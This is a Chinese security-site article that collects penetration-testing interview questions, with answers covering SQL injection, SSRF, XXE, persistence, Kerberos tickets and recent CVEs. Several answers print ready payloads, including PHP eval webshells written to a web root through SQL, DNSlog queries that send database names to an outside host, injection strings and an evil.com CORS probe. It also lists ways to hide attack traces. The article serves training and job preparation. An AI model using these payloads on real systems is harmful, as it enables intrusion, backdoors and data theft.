渗透测试面试近期热门题

2020-03-24 234478人围观 ,发现 61 个不明物体 漏洞网络安全

文章目录

前言

近期面试喜欢问的问题,总结了一下。

岗位分析

整体安全行业,随着网络安全的大火,Web安全入门浅,培训机构遍地开会,大量花里胡哨的人才都争着用了进来,所以想要突出,必须要有自己的一技之长。

那么当前网络安全的技术岗位,热门方向有很多,说几个例子。

逆向
APT
代码审计
区块链
渗透(不限于内网、CS客户端,APP,小程序,微服务等)

常见面试题及参考

问:MySQL写WebShell有几种方式,利用条件

答:

一、

union select 后写入

lines terminated by 写入

lines starting by 写入

fields terminated by 写入

COLUMNS terminated by 写入

二、

root权限

GPC关闭(能使用单引号),magic_quotes_gpc=On

有绝对路径(读文件可以不用,写文件必须)

没有配置–secure-file-priv

成功条件:有读写的权限,有create、insert、select的权限

问:Sql 注入无回显的情况下,利用 DNSlog,mysql 下利用什么构造代码,mssql 下又如何?

答:

(1)没有回显的情况下,一般编写脚本,进行自动化注入。但与此同时,由于防火墙的存在,容易被封禁IP,可以尝试调整请求频率,有条件的使用代理池进行请求。

(2)此时也可以使用 DNSlog 注入,原理就是把服务器返回的结果放在域名中,然后读取 DNS 解析时的日志,来获取想要的信息。

(3)Mysql 中利用 load_file() 构造payload

‘ and if((select load_file(concat(‘\\\\’,(select database()),’.xxx.ceye.io\\abc’))),1,0)# 

(4)Mssql 下利用 master..xp_dirtree 构造payload

DECLARE @host varchar(1024);SELECT @host=(SELECT db_name())+’.xxx.ceye.io’;EXEC(‘master..xp_dirtree”\’+@host+’\foobar$”‘);

问:phpmyadmin写sehll的方法

答:

一、常规导入shell的操作

创建数据表导出shell

CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );

INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘<?php @eval($_POST[pass]);?>’);

SELECT `content` FROM `shadow9` INTO OUTFILE ‘C:\\phpStudy\\WWW\\90sec.php’;

DROP TABLE IF EXISTS `shadow9`;

二、一句话导出shell:

select '<?php @eval($_POST[pass]);?>' into outfile 'c:/phpstudy/www/90sec.php';  

select '<?php @eval($_POST[pass]);?>' into outfile 'c:\\phpstudy\\www\\90sec.php';

select '<?php @eval($_POST[pass]);?>' into dumpfile 'c:\\phpstudy\\www\\bypass.php';

三、日志备份获取shell

show global variables like "%genera%";          //查询general_log配置

set global general_log='on';              //开启general log模式

SET global general_log_file='D:/phpStudy/WWW/cmd.php';    //设置日志文件保存路径

SELECT '<?php phpinfo();?>';              //phpinfo()写入日志文件

set global general_log='off';              //关闭general_log模式

问:权限维持的方法

答:

留自启动后门方法很多,大多数都添加到服务,加注册表 加启动项,

windows:

1.替换系统文件类(shift后门,放大镜后门)

2.修改注册表类

自启动项、屏幕保护程序注册表、用户登陆初始化、登录脚本、映像劫持、影子账户、AppCertDlls注册表项、AppInit_DLLs注册表项、文件关联、用户登陆初始化、xx.Netsh Helper DLL

3.文件类

自启动文件夹、office Word StartUp劫持

4.计划任务

schtasks 、WMI、bitsadmin

Linux

1.预加载型动态链接库后门

2.strace后门

3.SSH 后门

4.SUID后门

5.inetd服务后门

6.协议后门

7.vim后门

8.PAM后门

9.进程注入

10.Rootkit

11.端口复用

MSF权限维持

1.Persistence模块

2.Metsvc 模块

Powershell权限维持

CS权限维持

SC命令

问:XXE 漏洞原理,代码审计如何寻找?

答:

(1)XXE (XML 外部实体注入)当 应用允许引用 XML 外部实体时,攻击者通过构造恶意内容,就可能进行任意文件读取、系统命令执行、内网端口探测、内网网站攻击等操作。

支持的协议如下图:

Java :支持http、https、file、ftp、mailto、jar、netdoc、(1.8不支持gopher)

(2)审计函数,涉及到XML文件处理,都可能造成 XXE

(3)防御方法:禁用外部实体

问:SSRF 禁用 127.0.0.1 后如何绕过,支持哪些协议?

答:

(1)利用进制转换

(2)利用DNS解析

(3)利用句号(127。0。0。1)

(4)利用[::](http://[::]:80/);

(5)利用@(http://example.com@127.0.0.1);

(6)利用短地址(http://dwz.cn/11SMa);

(7)协议(Dict://、SFTP://、TFTP://、LDAP://、Gopher://)

问:应急响应如何查找挖矿病毒,如何通过进程找到挖矿文件

答:

(1)任务管理器netstat -anp寻找异常进程PID看端口信息,然后根据端口信息定位到文件,cd /proc/PID (ls -l查看),

禁用可疑的服务项。

(2)windows还可以用wmic分析进程参数

问:struts2框架漏洞原理

答:

(1)struts是java的web框架

(2)采取OGNL表达式,处理view层数据字符串到controller层转换成java对象

(3)重点关注的编号加粗如下

S2-057 影响范围非常小

S2-048 影响范围非常小

S2-046 和S2-045一样

S2-045 影响范围较大—-通过Content-Type这个header头,进而执行命令,通过Strus2对错误消息处理进行回显

S2-037 影响范围小

S2-032 影响范围小

S2-020 影响范围小

S2-019 影响范围一般

S2-016 影响范围非常大

S2-013 S2-016范围内

S2-009 S2-016范围内

S2-005 S2-016范围内

问:JAVA反序列化原理

答:

(1)Java序列化指Java对象转换为字节序列的过程

(2)Java反序列化指字节序列恢复为Java对象的过程

(3) Commons-collections 爆出第一个漏洞开始,Java反序列化漏洞的事件就层出不穷。

(4)在Java中,利用ObjectInputStream的readObject方法进行对象读取

(5)可以深入了解 ysoserial有哪些gadgets

问:cors如何产生,有哪些利用方式?绕过同源策略的方法有哪些?jsonp跨域如何利用?

答:

(1)CORS全称是”跨域资源共享”(Cross-origin resource sharing),Origin源未严格,从而造成跨域问题,允许浏览器向跨源服务器,发出XMLHttpRequest请求

(2)Origin为*的时候,使用curl测试CORS,

curl <url> -H “Origin: https://evil.com” -I

再寻找的api接口是否有敏感信息泄漏。

(3)同源:协议相同、域名相同、端口相同,绕过同源策略限制的方法:

1、document.domain属性

2、片段识别符(URL后加#号)

3、window.name

4、跨文档通信API

5、JSONP

6、CORS

7、WebSockets

(4)jsonp跨域利用:获取JSON数据并编码发送到远程服务器上

问:phar协议如何利用,php伪协议input与post数据包发送有什么区别?

答:

(1)可以Bypass一些waf,绕过上传限制

(2)Phar反序列化,Phar:// 伪协议读取phar文件时,会反序列化meta-data储存

(3) 区别

一、 application/x-www-form-urlencoded 或 multipart/form-data时

php://input 中是原始数据。

$_POST 中是关联数组,且没有上传控件的内容。

二、enctype=”multipart/form-data” 时

php://input 是无效的。

三、 Content-Type = “text/plain”时 

$_POST 不能获取post的数据, php://input可以。

问:内网服务器,如何进行信息收集

答:

(1)手动,用一些小工具(批量看存活)

new user /domain查域、net view看共享、hosts文件内网ip域名映射、wifi记录和密码、浏览器中的密码、敏感文件、各类服务的配置文件中信息、历史命令、ssh私钥、FTP的连接信息、xshell等ssh连接工具的session文件,3389连接历史和被连接历史信息、某些内网api接口未授权访问

(2)扫描器

主机扫描、端口扫描、漏洞扫描、识别内网环境、密码爆破、抓密码

(3)留后门,抓信息

问:内网黄金票据、白银票据的区别和利用方式

答:

(1)白银票据:抓取到了域控服务hash的情况下,在客户端以一个普通域用户的身份生成TGS票据,并且是针对于某个机器上的某个服务的,生成的白银票据,只能访问指定的target机器中指定的服务。

黄金票据:直接抓取域控中账号的hash,来在client端生成一个TGT票据,那么该票据是针对所有机器的所有服务。

(2)通过mimkatz执行,导出域控中账号的Hash

问:docker远程api漏洞原理

答:

(1)docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展,该未授权访问,可以通过url操作,执行docker命令。

(2)通过docker client执行目标服务器容器命令,docker是以root权限运行的

一、有运行ssh服务,/root/.ssh目录挂载到container内,,然后修改/.ssh/authorized_keys 文件,把自己的public key写进去

二、没有运行ssh服务,利用挂载写crontab定时任务,反弹一个shell

问:ssrf怎么用redis写shell

答:

(1)SSRF服务端请求伪造

一、对内网扫描,获取 banner 

二、攻击运行在内网的应用,主要是使用 GET 参数就可以实现的攻击(比如 Struts2,sqli 等)

三、利用协议读取本地文件

四、 云计算环境AWS Google Cloud 环境可以调用内网操作 ECS 的 API

(2)如webligic SSRF漏洞

通过SSRF的gopher协议操作内网的redis,利用redis将反弹shell写入crontab定时任务,url编码,将\r字符串替换成%0d%0a

问:预编译能否100%防sql注入,如果不能,写一个

答:

不能。

一、

$pdo->query('SET NAMES gbk');
$var = "\xbf\x27 OR 1=1 /*";
$query = 'SELECT * FROM test WHERE name = ? LIMIT 1';
$stmt = $pdo->prepare($query);
$stmt->execute(array($var));

类似于宽字节注入

二、

$dbh = new PDO("txf");
$name = $_GET['name'];
$stmt = $dbh->prepare('SELECT * FROM ' . $name . ' where username = :username');
$stmt->execute( array(':username' => $_REQUEST['username']) );

参数name是一串数组,PDO不会生效

三、

$stmt = $dbh->prepare('SELECT * FROM foo ORDER BY :userSuppliedData');

PDO对DDL不生效

问:WAF 绕过

答:

1 注释替换空格 

2 字符集绕过

3 chunked绕过

4 上传请求 multipart 绕过

5.参数污染

。。。

问:SQL注入构造payload

答:

一、布尔型盲注

(1)mysql :

‘and (length(database()))>10 –+

(2)oracle:

‘ and 1=(select decode(user,’SCOTT’,1,0) from dual) –

二、时间型盲注

and if(ascii(substr((select database()),1,1))>115,1,sleep(5))

三、利用报错回显

(1) extractvalue

and extractvalue(1,concat(0x7e,(select database())))

(2) updatexml

updatexml(1,concat(0x7e,(select @@version),0x7e),1)

问:UDF提权原理

答:利用了root 高权限,创建带有调用cmd的函数的udf.dll动态链接库,导出 udf.dll 文件后,我们就可以直接在命令框输入 cmd

问:提权方式

答:

windows:

1.systminfo  ,根据系统补丁提权

2.第三方服务提权

3.数据库提权

。。。

linux:

1.利用系统内核漏洞进行提权 

2.泄漏密码提权

3.sudo提权

4.SUID提权

。。。

问:XSS弹窗函数及常见的 XSS 绕过策略

答:

一、alert,confirm,prompt三种函数

二、绕过策略

1. 大小写混合

2. 双写

3.编码

4. fuzz 低频使用标签 <details/open/ontoggle>

5. fuzz 低频使用函数 ontoggle 等

6.<img/src=1>

7.%0a或者%0d绕过

问:Windows cmd 如何下载文件

答:

1.certutil.exe

2.powershell

3.bitsadmin

4.vbs

5.ftp

问:SVN/GIT源代码泄露

答:

(1)在使用SVN管理本地代码过程中,会自动生成一个名为.svn的隐藏文件夹,其中包含重要的源代码信息

/.git/config

(2)使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞

/.svn/entries

问:reverse_tcp 和 bind_tcp 的区别

答:

(1)reverse_tcp

木马会主动连接目标服务器

(2)bind_tcp

木马会监听本地的端口

什么是fastjson,有哪些漏洞?

答:

(1)Fastjson是Alibaba开发的Java语言编写的高性能JSON库

(2)攻击者准备rmi服务和web服务,将rmi绝对路径注入到lookup方法中,受害者JNDI接口会指向攻击者控制rmi服务器,JNDI接口向攻击者控制web服务器远程加载恶意代码,执行构造函数形成RCE

(3)fastjson漏洞历史

1.fastjson-1.2.24

(fastjson接受的JSON可以通过艾特type字段来指定该JSON应当还原成何种类型的对象,在反序列化的时候方便操作)

2.fastjson-1.248以下

(checkAutoType中使用TypeUtils.getClassFromMapping(typeName)去获取class不为空,从而绕过了黑名单检测)

3.fastjson-1.2.60以下

(在此版本以下,字符串中包含\x转义字符时可以造成dos漏洞)

问:隐藏攻击痕迹的方法

答:

1.跳板

2.代理服务器

3.Tor

4.日志

5.清除历史记录

6.粉碎文件

理解漏洞

讲诉一些近期及有代表性的漏洞

Microsoft Exchange .Net反序列化远程代码执行(CVE-2020-0688)

该漏洞是由于Exchange控制面板(ECP)组件中使用了静态密钥validationKey和decryptionKey

Apache Tomcat 文件包含漏洞(CVE-2020-1938)

默认情况下,Tomcat会开启AJP连接器, Tomcat在AJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的请求,可以读取或者包含Web根目录下的任意文件,配合文件上传,将导致任意代码执行(RCE)

Weblogic IIOP反序列化漏洞(CVE-2020-2551)

weblogic核心组件中IIOP协议,通过该协议对存在漏洞的WebLogic进行远程代码执行的攻击

Apache Solr远程代码执行(CVE-2019-12409)

默认配置文件solr.in.sh,在其配置文件中ENABLE_REMOTE_JMX_OPTS字段默认配置不安全.如果使用默认配置,将启用JMX监视服务并将对公网监听18983的RMI端口,无需任何验证,配合JMX RMI远程代码执行

SHIRO-550 反序列化漏洞

shiro默认使用了CookieRememberMeManager,其处理cookie的流程是:

得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化

AES的密钥是硬编码在代码里,就导致了反序列化的RCE漏洞

SHIRO-721反序列化漏洞

不需要key,利用Padding Oracle Attack构造出RememberMe字段后段的值结合合法的RememberMe cookie即可完成攻击

泛微Ecology OA SQL注入漏洞

validate.jsp接口的SQL注入,/cpt/manage/validate.jsp

泛微ecology OA系统接口存在数据库配置信息泄露

/mobile/dbconfigreader.jsp,直接访问该页面将为DES加密以后的乱码,使用DES算法结合硬编码的key进行解密

Confluence本地文件泄露漏洞(CVE-2019-3394)

catalina.jar中的org.apache.catalina.webresources.StandardRoot.class的getResource方法的validate存在过滤和限制,所以可遍历路径均在/WEB-INF下

Apache Dubbo反序列化漏洞(CVE-2019-17564)

当HTTP remoting 开启的时候,存在反序列化漏洞

*本文原创作者:绿帽子技术分享,本文属于FreeBuf原创奖励计划,未经许可禁止转载

相关推荐
发表评论

已有 61 条评论

取消
Loading...

文章目录

特别推荐

推荐关注

官方公众号

聚焦企业安全

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php